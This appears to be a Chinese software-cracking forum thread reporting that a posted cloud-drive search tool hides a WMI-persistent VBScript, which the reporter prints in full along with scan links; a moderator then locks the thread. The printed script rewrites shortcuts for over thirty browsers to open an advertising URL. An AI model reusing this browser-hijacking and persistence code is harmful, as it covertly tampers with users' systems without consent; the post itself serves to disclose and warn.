举报“【全球首发】云搜网盘助手，能搜现有所有网盘！”帖子

帖子链接：https://www.chinapyg.com/thread-85057-1-1.html举报人：帖子楼主。举报内容：楼主所发软件暗藏脚本为浏览器快捷方式添加广告小尾巴。1.火眼查毒 安装文件 “云搜网盘助手V1.0.0_1.exe” ：http://fireeye.ijinshan.com/analyse.html?md5=a577512c20c9b6723b023a11065d74b0&sha1=d7fbf627675a92d1b47e13d4a47a2670d03beb0e#key释放文件“SetHomePage.dll”：http://fireeye.ijinshan.com/analyse.html?md5=72f904ae3581cf599b38e8dbf0a13bb1&sha1=6492c0ef423cc0836a50694511006747193310df#full2.实测软件安装后，WMItool连接root\CIMV2 发现 _EventFilter.Name"VBScriptLive_filter", 查看ScriptTextScriptText 内容：On Error Resume Next:Const link = "http://hk.jtsh123.com/?r=y&m=1":Const link360 = "http://hk.jtsh123.com/?r=y&m=1&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Administrator\Desktop,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:行为：查找浏览器为快捷方式添加小尾巴，因脚本并非即时运行，具有较强隐蔽性。望管理员明察。

[PYG]版务督察

OK,先锁帖处理。等待测试结果。
谢谢~

h576676205

万能搜索顶贴